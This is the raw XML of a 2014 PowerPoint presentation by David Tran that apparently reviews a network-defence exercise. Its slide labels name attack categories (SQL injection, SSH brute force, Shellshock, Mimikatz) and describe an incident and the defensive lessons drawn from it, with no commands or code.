            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Freeform 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189384" y="3612012"/>
            <a:ext cx="1188346" cy="792626"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1188346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 792626"/>
              <a:gd name="connsiteX1" fmla="*/ 1188346 w 1188346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 792626"/>
              <a:gd name="connsiteX2" fmla="*/ 1188346 w 1188346"/>
              <a:gd name="connsiteY2" fmla="*/ 792626 h 792626"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1188346"/>
              <a:gd name="connsiteY3" fmla="*/ 792626 h 792626"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1188346"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 79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346" h="792626">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1188346" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1188346" y="792626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7926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1829138"/>
              <a:satOff val="-44179"/>
              <a:lumOff val="-4379"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1829138"/>
              <a:satOff val="-44179"/>
              <a:lumOff val="-4379"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="-1829138"/>
              <a:satOff val="-44179"/>
              <a:lumOff val="-437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0135" tIns="64008" rIns="64009" bIns="64008" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l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kern="1200" dirty="0" smtClean="0"/>
              <a:t>Core Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Freeform 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6555599" y="1709866"/>
            <a:ext cx="792230" cy="792230"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY0" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX1" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 792230"/>
              <a:gd name="connsiteX2" fmla="*/ 792230 w 792230"/>
              <a:gd name="connsiteY2" fmla="*/ 396115 h 792230"/>
              <a:gd name="connsiteX3" fmla="*/ 396115 w 792230"/>
              <a:gd name="connsiteY3" fmla="*/ 792230 h 792230"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 792230"/>
              <a:gd name="connsiteY4" fmla="*/ 396115 h 79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230" h="792230">
                <a:moveTo>
                  <a:pt x="0" y="396115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="177347"/>
                  <a:pt x="177347" y="0"/>
                  <a:pt x="396115" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="614883" y="0"/>
                  <a:pt x="792230" y="177347"/>
                  <a:pt x="792230" y="396115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="792230" y="614883"/>
                  <a:pt x="614883" y="792230"/>
                  <a:pt x="396115" y="792230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177347" y="792230"/>
                  <a:pt x="0" y="614883"/>
                  <a:pt x="0" y="396115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525497"/>
              <a:satOff val="0"/>
              <a:lumOff val="-14118"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2">
              <a:hueOff val="-1525497"/>
              <a:satOff val="0"/>
              <a:lumOff val="-1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019" tIns="116019" rIns="116019" bIns="11601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 smtClean="0"/>
              <a:t>David Tran</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="386257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Vulnerabilities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57900" y="1682488"/>
            <a:ext cx="2321718" cy="2007123"/>
            <a:chOff x="6057900" y="1682488"/>
            <a:chExt cx="2321718" cy="2007123"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6057900" y="1682488"/>
              <a:ext cx="2321718" cy="909123"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 909123"/>
                <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 909123"/>
                <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
                <a:gd name="connsiteY2" fmla="*/ 909123 h 909123"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY3" fmla="*/ 909123 h 909123"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 90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1718" h="909123">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2321718" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2321718" y="909123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9091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fillRef>
            <a:effectRef idx="3">
              <a:schemeClr val="accent1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b="1" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Hard Exploits</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2500" b="1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057900" y="2591611"/>
              <a:ext cx="2321718" cy="1098000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1098000"/>
                <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1098000"/>
                <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
                <a:gd name="connsiteY2" fmla="*/ 1098000 h 1098000"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY3" fmla="*/ 1098000 h 1098000"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
                <a:gd name="connsiteY4" fmla="*/ 0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1718" h="1098000">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2321718" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2321718" y="1098000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109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/>
                <a:t>Shellshock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800" kern="1200" dirty="0" smtClean="0"/>
                <a:t>RDP Exploit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3411140" y="1682488"/>
            <a:ext cx="2321718" cy="909123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 909123"/>
              <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 909123"/>
              <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY2" fmla="*/ 909123 h 909123"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY3" fmla="*/ 909123 h 909123"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 90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718" h="909123">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2321718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321718" y="909123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="90912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-2000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-2000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-20000"/>
            </a:schemeClr>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="177800" tIns="101600" rIns="177800" bIns="10160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smtClean="0"/>
              <a:t>Medium Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" b="1" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3411140" y="2591611"/>
            <a:ext cx="2321718" cy="1098000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1098000"/>
              <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1098000"/>
              <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY2" fmla="*/ 1098000 h 1098000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY3" fmla="*/ 1098000 h 1098000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10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718" h="1098000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2321718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321718" y="1098000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="109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/>
              <a:t>Denial of Service</a:t>
            </a:r>
            <a:endParaRPr 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err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
              <a:t> Dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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764381" y="1682488"/>
            <a:ext cx="2321718" cy="909123"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 909123"/>
              <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 909123"/>
              <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY2" fmla="*/ 909123 h 909123"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY3" fmla="*/ 909123 h 909123"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 90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718" h="909123">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2321718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321718" y="909123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="90912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9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0" tIns="101600" rIns="177800" bIns="10160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500" b="1" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Easy </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500" b="1" kern="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" b="1" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764381" y="2591611"/>
            <a:ext cx="2321718" cy="1098000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1098000"/>
              <a:gd name="connsiteX1" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1098000"/>
              <a:gd name="connsiteX2" fmla="*/ 2321718 w 2321718"/>
              <a:gd name="connsiteY2" fmla="*/ 1098000 h 1098000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY3" fmla="*/ 1098000 h 1098000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2321718"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10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718" h="1098000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2321718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321718" y="1098000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1098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012" tIns="96012" rIns="128016" bIns="144018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/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr 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800" kern="1200" dirty="0" smtClean="0"/>
              <a:t>SSH Brute Force</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="76981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Attacked during network setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database was altered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewall Scripts changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passwords changed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Forced to reformat &amp; redeploy network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Before Remote Log Server was configured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6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of SSH Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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41401"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840812" y="2038350"/>
            <a:ext cx="2859843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418" y="2038350"/>
            <a:ext cx="4714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711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671</TotalTime>
  <Words>542</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>136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Verve</vt:lpstr>
      <vt:lpstr>The Creativity Movement</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>System Vulnerabilities</vt:lpstr>
      <vt:lpstr>So What Happened?</vt:lpstr>
      <vt:lpstr>So What Happened?</vt:lpstr>
      <vt:lpstr>So What Happened?</vt:lpstr>
      <vt:lpstr>So What Happened?</vt:lpstr>
      <vt:lpstr>Slide 12</vt:lpstr>
      <vt:lpstr>So What Happened?</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Our Most Significant Attack</vt:lpstr>
      <vt:lpstr>Defensive Measures</vt:lpstr>
      <vt:lpstr>Defensive Measures</vt:lpstr>
      <vt:lpstr>Defensive Measures</vt:lpstr>
      <vt:lpstr>Lessons Learned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Creativity Movement</dc:title>
  <dc:creator>David Tran</dc:creator>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-11-20T05:50:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-12-11T21:01:09Z</dcterms:modified>
</cp:coreProperties>
</file>